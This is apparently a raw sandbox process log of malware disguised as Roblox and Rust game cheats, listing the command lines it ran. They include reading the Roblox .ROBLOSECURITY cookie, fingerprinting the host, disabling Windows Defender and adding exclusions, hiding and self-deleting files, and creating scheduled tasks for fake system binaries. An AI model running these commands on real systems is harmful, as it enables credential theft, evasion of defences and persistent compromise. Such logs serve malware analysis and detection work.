"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'
C:\Windows\system32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\system32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\system32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "471020934-1427772490-572142708-1711754108-114883849119215268499784406681658966023"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\system32\taskeng.exe
taskeng.exe {3E5015D7-882C-4837-9D08-B1BE7F1C1340} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Users\Admin\AppData\Roaming\svhost.exe
C:\Users\Admin\AppData\Roaming\svhost.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe'" /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zshxbpuc\zshxbpuc.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8C67.tmp" "c:\Users\Admin\AppData\Roaming\CSCFBCF61A8141645BEAB9116A612B9A.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gnve3ylj\gnve3ylj.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8CA6.tmp" "c:\Windows\System32\CSC362901114F874F39A37D2928E62229.TMP"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 14 /tr "'C:\hostNet\wscript.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\hostNet\wscript.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 10 /tr "'C:\hostNet\wscript.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\bridgeblockportComBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\bridgeblockportComBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\bridgeblockportComBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Common Files\Services\wscript.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Services\wscript.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\Services\wscript.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\L2Schemas\WmiPrvSE.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\L2Schemas\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Windows\L2Schemas\WmiPrvSE.exe'" /rl HIGHEST /f
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 10 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 14 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\X6ugBa7n7B.bat"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Program Files (x86)\Common Files\Services\wscript.exe
"C:\Program Files (x86)\Common Files\Services\wscript.exe"
C:\Windows\system32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\system32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\SysWOW64\cmd.exe
